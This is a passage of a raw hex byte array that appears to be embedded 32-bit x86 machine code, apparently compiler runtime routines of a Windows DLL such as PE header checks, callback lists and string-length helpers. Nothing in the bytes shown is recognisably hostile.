x90,0x83,0xF9,0x08,0x0F,0x85,0x06,0x02,0x00,0x00,0x0F,0xB6,0x9F,0x00,0x00,0x48,0x65,0x25,0xE0,0x00,0x00,0x00,0x84,0xDB,0x79,0x06,0x81,0xCB,0x00,0xFF,0xFF,0xFF,0x29,0xD3,0x8B,0x55,0xD4,0x01,0xD3,0x85,0xC0,0x75,0x0D,0x81,0xFB,0xFF,0x00,0x00,0x00,0x7F,0x6E,0x83,0xFB,0x80,0x7C,0x69,0x8B,0x45,0xD0,0xE8,0xA1,0xFD,0xFF,0xFF,0x88,0x9F,0x00,0x00,0x48,0x65,0x83,0xC6,0x0C,0x81,0xFE,0x6C,0xF1,0x48,0x65,0x0F,0x83,0xFC,0x00,0x00,0x00,0x8B,0x7E,0x04,0x8D,0x87,0x00,0x00,0x48,0x65,0x89,0x45,0xD0,0x8B,0x06,0x8D,0x90,0x00,0x00,0x48,0x65,0x8B,0x80,0x00,0x00,0x48,0x65,0x89,0x45,0xD4,0x8B,0x46,0x08,0x0F,0xB6,0xC8,0x3C,0x10,0x74,0x7D,0x83,0xF9,0x20,0x75,0x80,0x8B,0x5D,0xD4,0x29,0xD3,0x03,0x9F,0x00,0x00,0x48,0x65,0x25,0xE0,0x00,0x00,0x00,0x89,0xC1,0x0F,0x85,0xC0,0x00,0x00,0x00,0x85,0xDB,0x78,0xA9,0x8D,0x74,0x26,0x00,0x89,0x5C,0x24,0x10,0x8B,0x45,0xD4,0x89,0x44,0x24,0x0C,0x8B,0x45,0xD0,0x89,0x4C,0x24,0x04,0x89,0x44,0x24,0x08,0xC7,0x04,0x24,0xD8,0xED,0x48,0x65,0xE8,0xBE,0xFC,0xFF,0xFF,0x8D,0xB6,0x00,0x00,0x00,0x00,0x85,0xD2,0x0F,0x85,0xA0,0x00,0x00,0x00,0xA1,0x70,0xF1,0x48,0x65,0xBB,0x78,0xF1,0x48,0x65,0x89,0xC1,0x0B,0x0D,0x74,0xF1,0x48,0x65,0x0F,0x84,0xD7,0xFE,0xFF,0xFF,0xBB,0x6C,0xF1,0x48,0x65,0xE9,0xDA,0xFE,0xFF,0xFF,0x8D,0xB6,0x00,0x00,0x00,0x00,0x0F,0xB7,0x9F,0x00,0x00,0x48,0x65,0x25,0xE0,0x00,0x00,0x00,0x66,0x85,0xDB,0x79,0x06,0x81,0xCB,0x00,0x00,0xFF,0xFF,0x29,0xD3,0x8B,0x55,0xD4,0x01,0xD3,0x85,0xC0,0x75,0x18,0x81,0xFB,0x00,0x80,0xFF,0xFF,0x0F,0x8C,0x7A,0xFF,0xFF,0xFF,0x81,0xFB,0xFF,0xFF,0x00,0x00,0x0F,0x8F,0x6E,0xFF,0xFF,0xFF,0x8B,0x45,0xD0,0x83,0xC6,0x0C,0xE8,0xA3,0xFC,0xFF,0xFF,0x66,0x89,0x9F,0x00,0x00,0x48,0x65,0x81,0xFE,0x6C,0xF1,0x48,0x65,0x0F,0x82,0x04,0xFF,0xFF,0xFF,0x8B,0x7D,0xCC,0xEB,0x5D,0x8D,0x76,0x00,0x8B,0x45,0xD0,0xE8,0x80,0xFC,0xFF,0xFF,0x89,0x9F,0x00,0x00,0x48,0x65,0xE9,0xDA,0xFE,0xFF,0xFF,0x2E,0x8D,0x74,0x26,0x00,0xBB,0x6C,0xF1,0x48,0x65,0x81,0xFB,0x6C,0xF1,0x48,0x65,0x0F,0x83,0xD2,0xFD,0xFF,0xFF,0x89,0x7D,0xD4,0x8D,0x74,0x26,0x00,0x8B,0x73,0x04,0x8B,0x3B,0x83,0xC3,0x08,0x03,0xBE,0x00,0x00,0x48,0x65,0x8D,0x86,0x00,0x00,0x48,0x65,0xE8,0x3F,0xFC,0xFF,0xFF,0x89,0xBE,0x00,0x00,0x48,0x65,0x81,0xFB,0x6C,0xF1,0x48,0x65,0x72,0xD9,0x8B,0x7D,0xD4,0x8B,0x15,0x44,0x4A,0x49,0x65,0x85,0xD2,0x0F,0x8E,0x93,0xFD,0xFF,0xFF,0x8B,0x1D,0x70,0x61,0x49,0x65,0x8D,0x75,0xE4,0x8D,0xB4,0x26,0x00,0x00,0x00,0x00,0x8B,0x15,0x48,0x4A,0x49,0x65,0x8D,0x04,0xBF,0x8D,0x04,0x82,0x8B,0x10,0x85,0xD2,0x74,0x1A,0x89,0x74,0x24,0x0C,0x89,0x54,0x24,0x08,0x8B,0x50,0x08,0x89,0x54,0x24,0x04,0x8B,0x40,0x04,0x89,0x04,0x24,0xFF,0xD3,0x83,0xEC,0x10,0x83,0xC7,0x01,0x3B,0x3D,0x44,0x4A,0x49,0x65,0x7C,0xC9,0x8D,0x65,0xF4,0x5B,0x5E,0x5F,0x5D,0xC3,0x89,0x4C,0x24,0x04,0xC7,0x04,0x24,0xAC,0xED,0x48,0x65,0xE8,0x61,0xFB,0xFF,0xFF,0x89,0x44,0x24,0x04,0xC7,0x04,0x24,0x78,0xED,0x48,0x65,0xE8,0x51,0xFB,0xFF,0xFF,0x90,0x55,0x89,0xE5,0x57,0x56,0x53,0x83,0xEC,0x1C,0xC7,0x04,0x24,0x54,0x4A,0x49,0x65,0xFF,0x15,0x2C,0x61,0x49,0x65,0x8B,0x1D,0x4C,0x4A,0x49,0x65,0x83,0xEC,0x04,0x85,0xDB,0x74,0x36,0x8B,0x3D,0x6C,0x61,0x49,0x65,0x8D,0xB4,0x26,0x00,0x00,0x00,0x00,0x8B,0x03,0x89,0x04,0x24,0xFF,0xD7,0x89,0xC6,0x83,0xEC,0x04,0xFF,0x15,0x34,0x61,0x49,0x65,0x85,0xF6,0x74,0x0C,0x85,0xC0,0x75,0x08,0x8B,0x43,0x04,0x89,0x34,0x24,0xFF,0xD0,0x8B,0x5B,0x08,0x85,0xDB,0x75,0xD7,0xC7,0x04,0x24,0x54,0x4A,0x49,0x65,0xFF,0x15,0x58,0x61,0x49,0x65,0x83,0xEC,0x04,0x8D,0x65,0xF4,0x5B,0x5E,0x5F,0x5D,0xC3,0x2E,0x8D,0xB4,0x26,0x00,0x00,0x00,0x00,0x8D,0xB4,0x26,0x00,0x00,0x00,0x00,0xA1,0x50,0x4A,0x49,0x65,0x85,0xC0,0x75,0x07,0x31,0xC0,0xC3,0x8D,0x74,0x26,0x00,0x55,0x89,0xE5,0x53,0x83,0xEC,0x14,0xC7,0x44,0x24,0x04,0x0C,0x00,0x00,0x00,0xC7,0x04,0x24,0x01,0x00,0x00,0x00,0xE8,0xED,0x0A,0x00,0x00,0x89,0xC3,0x85,0xC0,0x74,0x40,0x8B,0x45,0x08,0x89,0x03,0x8B,0x45,0x0C,0x89,0x43,0x04,0xC7,0x04,0x24,0x54,0x4A,0x49,0x65,0xFF,0x15,0x2C,0x61,0x49,0x65,0xA1,0x4C,0x4A,0x49,0x65,0x89,0x1D,0x4C,0x4A,0x49,0x65,0x83,0xEC,0x04,0x89,0x43,0x08,0xC7,0x04,0x24,0x54,0x4A,0x49,0x65,0xFF,0x15,0x58,0x61,0x49,0x65,0x31,0xC0,0x83,0xEC,0x04,0x8B,0x5D,0xFC,0xC9,0xC3,0x83,0xC8,0xFF,0xEB,0xF6,0x2E,0x8D,0xB4,0x26,0x00,0x00,0x00,0x00,0x66,0x90,0x55,0x89,0xE5,0x53,0x83,0xEC,0x14,0xA1,0x50,0x4A,0x49,0x65,0x8B,0x5D,0x08,0x85,0xC0,0x75,0x0D,0x8B,0x5D,0xFC,0x31,0xC0,0xC9,0xC3,0x8D,0xB6,0x00,0x00,0x00,0x00,0xC7,0x04,0x24,0x54,0x4A,0x49,0x65,0xFF,0x15,0x2C,0x61,0x49,0x65,0xA1,0x4C,0x4A,0x49,0x65,0x83,0xEC,0x04,0x85,0xC0,0x74,0x27,0x31,0xC9,0xEB,0x0B,0x8D,0x76,0x00,0x89,0xC1,0x85,0xD2,0x74,0x1A,0x89,0xD0,0x8B,0x10,0x39,0xDA,0x8B,0x50,0x08,0x75,0xEF,0x85,0xC9,0x74,0x2B,0x89,0x51,0x08,0x89,0x04,0x24,0xE8,0x40,0x0A,0x00,0x00,0xC7,0x04,0x24,0x54,0x4A,0x49,0x65,0xFF,0x15,0x58,0x61,0x49,0x65,0x8B,0x5D,0xFC,0x31,0xC0,0x83,0xEC,0x04,0xC9,0xC3,0x2E,0x8D,0xB4,0x26,0x00,0x00,0x00,0x00,0x90,0x89,0x15,0x4C,0x4A,0x49,0x65,0xEB,0xD0,0x2E,0x8D,0xB4,0x26,0x00,0x00,0x00,0x00,0x55,0x89,0xE5,0x53,0x83,0xEC,0x14,0x8B,0x45,0x0C,0x83,0xF8,0x02,0x0F,0x84,0x9D,0x00,0x00,0x00,0x77,0x2B,0x85,0xC0,0x74,0x3F,0xA1,0x50,0x4A,0x49,0x65,0x85,0xC0,0x0F,0x84,0xAA,0x00,0x00,0x00,0xC7,0x05,0x50,0x4A,0x49,0x65,0x01,0x00,0x00,0x00,0x8B,0x5D,0xFC,0xB8,0x01,0x00,0x00,0x00,0xC9,0xC3,0x8D,0xB6,0x00,0x00,0x00,0x00,0x83,0xF8,0x03,0x75,0xEB,0xA1,0x50,0x4A,0x49,0x65,0x85,0xC0,0x74,0xE2,0xE8,0x1D,0xFE,0xFF,0xFF,0xEB,0xDB,0x8D,0x76,0x00,0xA1,0x50,0x4A,0x49,0x65,0x85,0xC0,0x75,0x5F,0xA1,0x50,0x4A,0x49,0x65,0x83,0xF8,0x01,0x75,0xC5,0x8B,0x1D,0x4C,0x4A,0x49,0x65,0x85,0xDB,0x74,0x14,0x8D,0x76,0x00,0x89,0xD8,0x8B,0x5B,0x08,0x89,0x04,0x24,0xE8,0x8B,0x09,0x00,0x00,0x85,0xDB,0x75,0xEF,0xC7,0x05,0x4C,0x4A,0x49,0x65,0x00,0x00,0x00,0x00,0xC7,0x05,0x50,0x4A,0x49,0x65,0x00,0x00,0x00,0x00,0xC7,0x04,0x24,0x54,0x4A,0x49,0x65,0xFF,0x15,0x28,0x61,0x49,0x65,0x83,0xEC,0x04,0xEB,0x81,0x90,0xE8,0x4B,0x04,0x00,0x00,0x8B,0x5D,0xFC,0xB8,0x01,0x00,0x00,0x00,0xC9,0xC3,0x90,0xE8,0xAB,0xFD,0xFF,0xFF,0xEB,0x9A,0x2E,0x8D,0xB4,0x26,0x00,0x00,0x00,0x00,0x90,0xC7,0x04,0x24,0x54,0x4A,0x49,0x65,0xFF,0x15,0x54,0x61,0x49,0x65,0x83,0xEC,0x04,0xE9,0x41,0xFF,0xFF,0xFF,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x55,0x31,0xD2,0x89,0xE5,0x8B,0x45,0x08,0x66,0x81,0x38,0x4D,0x5A,0x75,0x0B,0x03,0x40,0x3C,0x81,0x38,0x50,0x45,0x00,0x00,0x74,0x06,0x89,0xD0,0x5D,0xC3,0x66,0x90,0x31,0xD2,0x66,0x81,0x78,0x18,0x0B,0x01,0x5D,0x0F,0x94,0xC2,0x89,0xD0,0xC3,0x90,0x55,0x89,0xE5,0x56,0x8B,0x55,0x08,0x53,0x8B,0x5D,0x0C,0x03,0x52,0x3C,0x0F,0xB7,0x42,0x14,0x0F,0xB7,0x72,0x06,0x8D,0x44,0x02,0x18,0x66,0x85,0xF6,0x74,0x21,0x31,0xC9,0x8D,0xB4,0x26,0x00,0x00,0x00,0x00,0x8B,0x50,0x0C,0x39,0xD3,0x72,0x07,0x03,0x50,0x08,0x39,0xD3,0x72,0x0C,0x83,0xC1,0x01,0x83,0xC0,0x28,0x39,0xF1,0x75,0xE8,0x31,0xC0,0x5B,0x5E,0x5D,0xC3,0x2E,0x8D,0xB4,0x26,0x00,0x00,0x00,0x00,0x66,0x90,0x55,0x89,0xE5,0x57,0x56,0x53,0x31,0xDB,0x83,0xEC,0x1C,0x8B,0x45,0x08,0x89,0x04,0x24,0xE8,0xE2,0x08,0x00,0x00,0x83,0xF8,0x08,0x77,0x72,0x66,0x81,0x3D,0x00,0x00,0x48,0x65,0x4D,0x5A,0x75,0x67,0x8B,0x15,0x3C,0x00,0x48,0x65,0x81,0xBA,0x00,0x00,0x48,0x65,0x50,0x45,0x00,0x00,0x8D,0x82,0x00,0x00,0x48,0x65,0x75,0x4F,0x66,0x81,0xBA,0x18,0x00,0x48,0x65,0x0B,0x01,0x75,0x44,0x0F,0xB7,0x92,0x14,0x00,0x48,0x65,0x0F,0xB7,0x78,0x06,0x8D,0x5C,0x10,0x18,0x66,0x85,0xFF,0x74,0x43,0x31,0xF6,0xEB,0x11,0x8D,0xB4,0x26,0x00,0x00,0x00,0x00,0x83,0xC6,0x01,0x83,0xC3,0x28,0x39,0xFE,0x74,0x2E,0x8B,0x45,0x08,0xC7,0x44,0x24,0x08,0x08,0x00,0x00,0x00,0x89,0x1C,0x24,0x89,0x44,0x24,0x04,0xE8,0x77,0x08,0x00,0x00,0x85,0xC0,0x75,0xDB,0x83,0xC4,0x1C,0x89,0xD8,0x5B,0x5E,0x5F,0x5D,0xC3,0x2E,0x8D,0xB4,0x26,0x00,0x00,0x00,0x00,0x90,0x83,0xC4,0x1C,0x31,0xDB,0x89,0xD8,0x5B,0x5E,0x5F,0x5D,0xC3,0x8D,0x74,0x26,0x00,0x31,0xC0,0x66,0x81,0x3D,0x00,0x00,0x48,0x65,0x4D,0x5A,0x75,0x18,0x8B,0x0D,0x3C,0x00,0x48,0x65,0x81,0xB9,0x00,0x00,0x48,0x65,0x50,0x45,0x00,0x00,0x8D,0x91,0x00,0x00,0x48,0x65,0x74,0x0B,0xC3,0x2E,0x8D,0xB4,0x26,0x00,0x00,0x00,0x00,0x66,0x90,0x66,0x81,0xB9,0x18,0x00,0x48,0x65,0x0B,0x01,0x75,0xEA,0x55,0x0F,0xB7,0x81,0x14,0x00,0x48,0x65,0x8D,0x44,0x02,0x18,0x89,0xE5,0x56,0x0F,0xB7,0xB1,0x06,0x00,0x48,0x65,0x53,0x8B,0x5D,0x08,0x81,0xEB,0x00,0x00,0x48,0x65,0x66,0x85,0xF6,0x74,0x20,0x31,0xC9,0x8D,0xB6,0x00,0x00,0x00,0x00,0x8B,0x50,0x0C,0x39,0xD3,0x72,0x07,0x03,0x50,0x08,0x39,0xD3,0x72,0x0C,0x83,0xC1,0x01,0x83,0xC0,0x28,0x39,0xCE,0x75,0xE8,0x31,0xC0,0x5B,0x5E,0x5D,0xC3,0x2E,0x8D,0xB4,0x26,0x00,0x00,0x00,0x00,0x66,0x90,0x31,0xC0,0x66,0x81,0x3D,0x00,0x00,0x48,0x65,0x4D,0x5A,0x75,0x12,0x8B,0x15,0x3C,0x00,0x48,0x65,0x81,0xBA,0x00,0x00,0x48,0x65,0x50,0x45,0x00,0x00,0x74,0x01,0xC3,0x66,0x81,0xBA,0x18,0x00,0x48,0x65,0x0B,0x01,0x75,0xF4,0x0F,0xB7,0x82,0x06,0x00,0x48,0x65,0xC3,0x2E,0x8D,0xB4,0x26,0x00,0x00,0x00,0x00,0x2E,0x8D,0x74,0x26,0x00,0x55,0x31,0xC0,0x66,0x81,0x3D,0x00,0x00,0x48,0x65,0x4D,0x5A,0x89,0xE5,0x53,0x8B,0x4D,0x08,0x75,0x18,0x8B,0x1D,0x3C,0x00,0x48,0x65,0x81,0xBB,0x00,0x00,0x48,0x65,0x50,0x45,0x00,0x00,0x8D,0x93,0x00,0x00,0x48,0x65,0x74,0x0C,0x8B,0x5D,0xFC,0xC9,0xC3,0x8D,0xB4,0x26,0x00,0x00,0x00,0x00,0x66,0x81,0xBB,0x18,0x00,0x48,0x65,0x0B,0x01,0x75,0xE9,0x0F,0xB7,0x83,0x14,0x00,0x48,0x65,0x0F,0xB7,0x9B,0x06,0x00,0x48,0x65,0x8D,0x44,0x02,0x18,0x66,0x85,0xDB,0x74,0x1D,0x31,0xD2,0x8D,0x74,0x26,0x00,0xF6,0x40,0x27,0x20,0x74,0x07,0x85,0xC9,0x74,0xC2,0x83,0xE9,0x01,0x83,0xC2,0x01,0x83,0xC0,0x28,0x39,0xDA,0x75,0xE9,0x8B,0x5D,0xFC,0x31,0xC0,0xC9,0xC3,0x66,0x90,0x31,0xC0,0x66,0x81,0x3D,0x00,0x00,0x48,0x65,0x4D,0x5A,0x75,0x12,0x8B,0x15,0x3C,0x00,0x48,0x65,0x81,0xBA,0x00,0x00,0x48,0x65,0x50,0x45,0x00,0x00,0x74,0x01,0xC3,0x66,0x81,0xBA,0x18,0x00,0x48,0x65,0x0B,0x01,0xBA,0x00,0x00,0x48,0x65,0x0F,0x44,0xC2,0xC3,0x2E,0x8D,0xB4,0x26,0x00,0x00,0x00,0x00,0x8D,0xB6,0x00,0x00,0x00,0x00,0x31,0xD2,0x66,0x81,0x3D,0x00,0x00,0x48,0x65,0x4D,0x5A,0x75,0x17,0xA1,0x3C,0x00,0x48,0x65,0x81,0xB8,0x00,0x00,0x48,0x65,0x50,0x45,0x00,0x00,0x8D,0x88,0x00,0x00,0x48,0x65,0x74,0x0C,0x89,0xD0,0xC3,0x2E,0x8D,0xB4,0x26,0x00,0x00,0x00,0x00,0x90,0x66,0x81,0xB8,0x18,0x00,0x48,0x65,0x0B,0x01,0x75,0xE9,0x55,0x0F,0xB7,0x80,0x14,0x00,0x48,0x65,0x8D,0x44,0x01,0x18,0x89,0xE5,0x56,0x53,0x8B,0x5D,0x08,0x0F,0xB7,0x71,0x06,0x81,0xEB,0x00,0x00,0x48,0x65,0x66,0x85,0xF6,0x74,0x1D,0x31,0xC9,0x90,0x8B,0x50,0x0C,0x39,0xD3,0x72,0x07,0x03,0x50,0x08,0x39,0xD3,0x72,0x12,0x83,0xC1,0x01,0x83,0xC0,0x28,0x39,0xCE,0x75,0xE8,0x31,0xD2,0x5B,0x89,0xD0,0x5E,0x5D,0xC3,0x8B,0x50,0x24,0x5B,0x5E,0x5D,0xF7,0xD2,0xC1,0xEA,0x1F,0x89,0xD0,0xC3,0x66,0x90,0x55,0x31,0xC9,0x66,0x81,0x3D,0x00,0x00,0x48,0x65,0x4D,0x5A,0x89,0xE5,0x57,0x56,0x53,0x8B,0x5D,0x08,0x75,0x17,0xA1,0x3C,0x00,0x48,0x65,0x81,0xB8,0x00,0x00,0x48,0x65,0x50,0x45,0x00,0x00,0x8D,0xB0,0x00,0x00,0x48,0x65,0x74,0x0B,0x5B,0x89,0xC8,0x5E,0x5F,0x5D,0xC3,0x8D,0x74,0x26,0x00,0x66,0x81,0xB8,0x18,0x00,0x48,0x65,0x0B,0x01,0x75,0xEA,0x8B,0x80,0x80,0x00,0x48,0x65,0x85,0xC0,0x74,0xE0,0x0F,0xB7,0x56,0x14,0x0F,0xB7,0x7E,0x06,0x8D,0x54,0x16,0x18,0x66,0x85,0xFF,0x74,0xCF,0x31,0xF6,0x8B,0x4A,0x0C,0x39,0xC8,0x72,0x07,0x03,0x4A,0x08,0x39,0xC8,0x72,0x1A,0x83,0xC6,0x01,0x83,0xC2,0x28,0x39,0xF7,0x75,0xE8,0x31,0xC9,0x5B,0x5E,0x89,0xC8,0x5F,0x5D,0xC3,0x8D,0xB4,0x26,0x00,0x00,0x00,0x00,0x05,0x00,0x00,0x48,0x65,0xEB,0x07,0x90,0x83,0xEB,0x01,0x83,0xC0,0x14,0x8B,0x48,0x04,0x85,0xC9,0x75,0x07,0x8B,0x50,0x0C,0x85,0xD2,0x74,0xD4,0x85,0xDB,0x7F,0xE8,0x8B,0x48,0x0C,0x5B,0x5E,0x5F,0x81,0xC1,0x00,0x00,0x48,0x65,0x5D,0x89,0xC8,0xC3,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0xDB,0xE3,0xC3,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x51,0x50,0x3D,0x00,0x10,0x00,0x00,0x8D,0x4C,0x24,0x0C,0x72,0x15,0x81,0xE9,0x00,0x10,0x00,0x00,0x83,0x09,0x00,0x2D,0x00,0x10,0x00,0x00,0x3D,0x00,0x10,0x00,0x00,0x77,0xEB,0x29,0xC1,0x83,0x09,0x00,0x58,0x59,0xC3,0x90,0x90,0x66,0x90,0x66,0x90,0xB8,0x01,0x00,0x00,0x00,0xC2,0x0C,0x00,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x55,0x31,0xD2,0x89,0xE5,0x53,0x8B,0x4D,0x0C,0x8B,0x5D,0x08,0x89,0xD8,0x85,0xC9,0x75,0x11,0xEB,0x14,0x8D,0x74,0x26,0x00,0x83,0xC0,0x01,0x89,0xC2,0x29,0xDA,0x39,0xCA,0x73,0x05,0x80,0x38,0x00,0x75,0xF0,0x8B,0x5D,0xFC,0x89,0xD0,0xC9,0xC3,0x90,0x55,0x31,0xC0,0x89,0xE5,0x8B,0x55,0x0C,0x8B,0x4D,0x08,0x85,0xD2,0x75,0x10,0xEB,0x17,0x8D,0xB4,0x26,0x00,0x00,0x00,0x00,0x83,0xC0,0x01,0x39,0xC2,0x74,0x09,0x66,0x83,0x3C,0x41,0x00,0x75,0xF2,0x89,0xC2,0x89,0xD0,0x5D,0xC3,0x90,0x90,0x90,0x90,0x55,0x89,0xE5,0x57,0x56,0x53,0x83,0xEC,0x2C,0x8B,0x75,0x08,0x85,0xF6,0x0F,0x84,0x8A,0x00,0x00,0x00,0x89,0x34,0x24,0xE8,0x9C,0x04,0x00,0x00,0x8D,0x7C,0x00,0x01,0x89,0x3C,0x24,0xE8,0x48,0x04,0x00,0x00,0x89,0xC3,0x85,0xC0,0x75,0x31,0xEB,0x3F,0x8B,0x45,0x0C,0x89,0x74,0x24,0x08,0x89,0x7C,0x24,0x04,0x89,0x44,0x24,0x0C,0x89,0x1C,0x24,0xE8,0x01,0x04,0x00,0x00,0x85,0xC0,0x79,0x3D,0x01,0xFF,0x89,0x1C,0x24,0x89,0x7C,0x24,0x04,0xE8,0x47,0x04,0x00,0x00,0x85,0xC0,0x74,0x0A,0x89,0xC3,0x81,0xFF,0xFE,0xFF,0xFF,0x7F,0x76,0xC9,0x89,0x1C,0x24,0xE8,0xF1,0x03,0x00,0x00,0xC7,0x04,0x24,0x0C,0x00,0x00,0x00,0xE8,0xA5,0x00,0x00,0x00,0xB8,0xFF,0xFF,0xFF,0xFF,0xEB,0x14,0x8D,0xB6,0x00,0x00,0x00,0x00,0x89,0x1C,0x24,0x89,0x45,0xE4,0xE8,0xCD,0x03,0x00,0x00,0x8B,0x45,0xE4,0x83,0xC4,0x2C,0x5B,0x5E,0x5F,0x5D,0xC3,0xC7,0x04,0x24,0x16,0x00,0x00,0x00,0xE8,0x76,0x00,0x00,0x00,0xEB,0xCF,0x8D,0x74,0x26,0x00,0x55,0x89,0xE5,0x56,0x53,0x83,0xEC,0x10,0x8B,0x5D,0x08,0x8B,0x75,0x0C,0xC7,0x04,0x24,0x2C,0xEE,0x48,0x65,0xFF,0x15,0x3C,0x61,0x49,0x65,0x83,0xEC,0x04,0x85,0xC0,0x74,0x2E,0xC7,0x44,0x24,0x04,0x42,0xEE,0x48,0x65,0x89,0x04,0x24,0xFF,0x15,0x40,0x61,0x49,0x65,0x83,0xEC,0x08,0x85,0xC0,0x74,0x16,0xA3,0x90,0xD0,0x48,0x65,0x89,0x75,0x0C,0x89,0x5D,0x08,0x8D,0x65,0xF8,0x5B,0x5E,0x5D,0xFF,0xE0,0x8D,0x76,0x00,0xB8,0xB0,0xC7,0x48,0x65,0xEB,0xE3,0x2E,0x8D,0xB4,0x26,0x00,0x00,0x00,0x00,0x90,0xFF,0x25,0x90,0xD0,0x48,0x65,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x55,0x89,0xE5,0x83,0xEC,0x08,0xE8,0xFD,0x02,0x00,0x00,0x8B,0x55,0x08,0x89,0x10,0x31,0xC0,0xC9,0xC3,0x2E,0x8D,0xB4,0x26,0x00,0x00,0x00,0x00,0x8D,0x74,0x26,0x00,0x55,0x89,0xE5,0x53,0x83,0xEC,0x04,0x8B,0x5D,0x08,0x85,0xDB,0x74,0x12,0xE8,0xD5,0x02,0x00,0x00,0x8B,0x00,0x89,0x03,0x8B,0x5D,0xFC,0x31,0xC0,0xC9,0xC3,0x66,0x90,0xE8,0xC3,0x02,0x00,0x00,0x8B,0x5D,0xFC,0xC7,0x00,0x16,0x00,0x00,0x00,0xB8,0x16,0x00,0x00,0x00,0xC9,0xC3,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0xE9,0x9B,0x03,0x00,0x00,0x2E,0x8D,0xB4,0x26,0x00,0x00,0x00,0x00,0x8D,0x76,0x00,0x55,0x89,0xE5,0x57,0x56,0x53,0x83,0xEC,0x2C,0xA1,0x94,0xD0,0x48,0x65,0x8B,0x5D,0x08,0x8B,0x75,0x0C,0x8B,0x7D,0x10,0x8B,0x55,0x14,0x3D,0x40,0xC9,0x48,0x65,0x74,0x1F,0x89,0x55,0x14,0x89,0x7D,0x10,0x89,0x75,0x0C,0x89,0x5D,0x08,0x8D,0x65,0xF4,0x5B,0x5E,0x5F,0x5D,0xFF,0xE0,0x2E,0x8D,0xB4,0x26,0x00,0x00,0x00,0x00,0x66,0x90,0x89,0x55,0xE4,0xC7,0x04,0x24,0x50,0xEE,0x48,0x65,0xFF,0x15,0x3C,0x61,0x49,0x65,0x83,0xEC,0x04,0xC7,0x44,0x24,0x04,0x66,0xEE,0x48,0x65,0x89,0x04,0x24,0xFF,0x15,0x40,0x61,0x49,0x65,0xB9,0x30,0xC9,0x48,0x65,0x8B,0x55,0xE4,0x83,0xEC,0x08,0x85,0xC0,0x0F,0x44,0xC1,0xA3,0x94,0xD0,0x48,0x65,0xEB,0xA6,0x2E,0x8D,0x74,0x26,0x00,0x55,0x89,0xE5,0x57,0x56,0x53,0x83,0xEC,0x2C,0xA1,0x94,0xD0,0x48,0x65,0x8B,0x5D,0x08,0x8B,0x75,0x0C,0x8B,0x7D,0x10,0x8B,0x55,0x14,0x3D,0x40,0xC9,0x48,0x65,0x74,0x1F,0x89,0x55,0x14,0x89,0x7D,0x10,0x89,0x75,0x0C,0x89,0x5D,0x08,0x8D,0x65,0xF4,0x5B,0x5E,0x5F,0x5D,0xFF,0xE0,0x2E,0x8D,0xB4,0x26,0x00,0x00,0x00,0x00,0x66,0x90,0x89,0x55,0xE4,0xC7,0x04,0x24,0x50,0xEE,0x48,0x65,0xFF,0x15,0x3C,0x61,0x49,0x65,0x83,0xEC,0x04,0xC7,0x44,0x24,0x04,0x66,0xEE,0x48,0x65,0x89,0x04,0x24,0xFF,0x15,0x40,0x61,0x49,0x65,0xB9,0x30,0xC9,0x48,0x65,0x8B,0x55,0xE4,0x83,0xEC,0x08,0x85,0xC0,0x0F,0x44,0xC1,0xA3,0x94,0xD0,0x48,0x65,0xEB,0xA6,0x90,0x90,0x90,0x90,0x90,0x55,0x89,0xE5,0x8B,0x45,0x08,0x5D,0xC1,0xE0,0x05,0x03,0x05,0x8C,0x61,0x49,0x65,0xC3,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x55,0x89,0xE5,0x8B,0x45,0x08,0x85,0xC0,0x74,0x18,0xC7,0x40,0x08,0x00,0x00,0x00,0x00,0xC7,0x40,0x04,0x00,0x00,0x00,0x00,0xC7,0x00,0x00,0x00,0x00,0x00,0x31,0xC0,0x5D,0xC3,0xB8,0xFF,0xFF,0xFF,0xFF,0x5D,0xC3,0x8D,0xB4,0x26,0x00,0x00,0x00,0x00,0x55,0x89,0xE5,0x57,0x56,0x53,0x83,0xEC,0x1C,0x8B,0x5D,0x08,0x85,0xDB,0x0F,0x84,0xAD,0x00,0x00,0x00,0xC7,0x04,0x24,0x08,0x00,0x00,0x00,0xE8,0x38,0x01,0x00,0x00,0x8B,0x03,0x85,0xC0,0x74,0x62,0x8B,0x53,0x04,0x8B,0x43,0x08,0x39,0xC2,0x74,0x28,0x8D,0x42,0x04,0x89,0x43,0x04,0x8B,0x45,0x0C,0x89,0x02,0xC7,0x04,0x24,0x08,0x00,0x00,0x00,0xE8,0x19,0x01,0x00,0x00,0x31,0xC0,0x83,0xC4,0x1C,0x5B,0x5E,0x5F,0x5D,0xC3,0x8D,0xB4,0x26,0x00,0x00,0x00,0x00,0x8B,0x03,0x89,0xD7,0x29,0xC7,0x89,0x04,0x24,0x89,0xFE,0xC1,0xFE,0x02,0xC1,0xE6,0x03,0x89,0x74,0x24,0x04,0xE8,0x4E,0x01,0x00,0x00,0x85,0xC0,0x74,0x3F,0x89,0x03,0x8D,0x14,0x38,0x01,0xF0,0x89,0x43,0x08,0xEB,0xAE,0x8D,0xB6,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x04,0x04,0x00,0x00,0x00,0xC7,0x04,0x24,0x20,0x00,0x00,0x00,0xE8,0xDC,0x00,0x00,0x00,0x89,0x03,0x89,0xC2,0x85,0xC0,0x74,0x11,0x89,0x43,0x04,0x8D,0x80,0x80,0x00,0x00,0x00,0x89,0x43,0x08,0xE9,0x77,0xFF,0xFF,0xFF,0xC7,0x04,0x24,0x08,0x00,0x00,0x00,0xE8,0x9F,0x00,0x00,0x00,0x83,0xC8,0xFF,0xEB,0x83,0x2E,0x8D,0xB4,0x26,0x00,0x00,0x00,0x00,0x66,0x90,0x55,0x89,0xE5,0x57,0x56,0x53,0x83,0xEC,0x1C,0x8B,0x7D,0x08,0xC7,0x04,0x24,0x08,0x00,0x00,0x00,0xE8,0x70,0x00,0x00,0x00,0x8B,0x37,0x8B,0x5F,0x04,0xC7,0x47,0x08,0x00,0x00,0x00,0x00,0xC7,0x47,0x04,0x00,0x00,0x00,0x00,0xC7,0x07,0x00,0x00,0x00,0x00,0xC7,0x04,0x24,0x08,0x00,0x00,0x00,0xE8,0x53,0x00,0x00,0x00,0x85,0xF6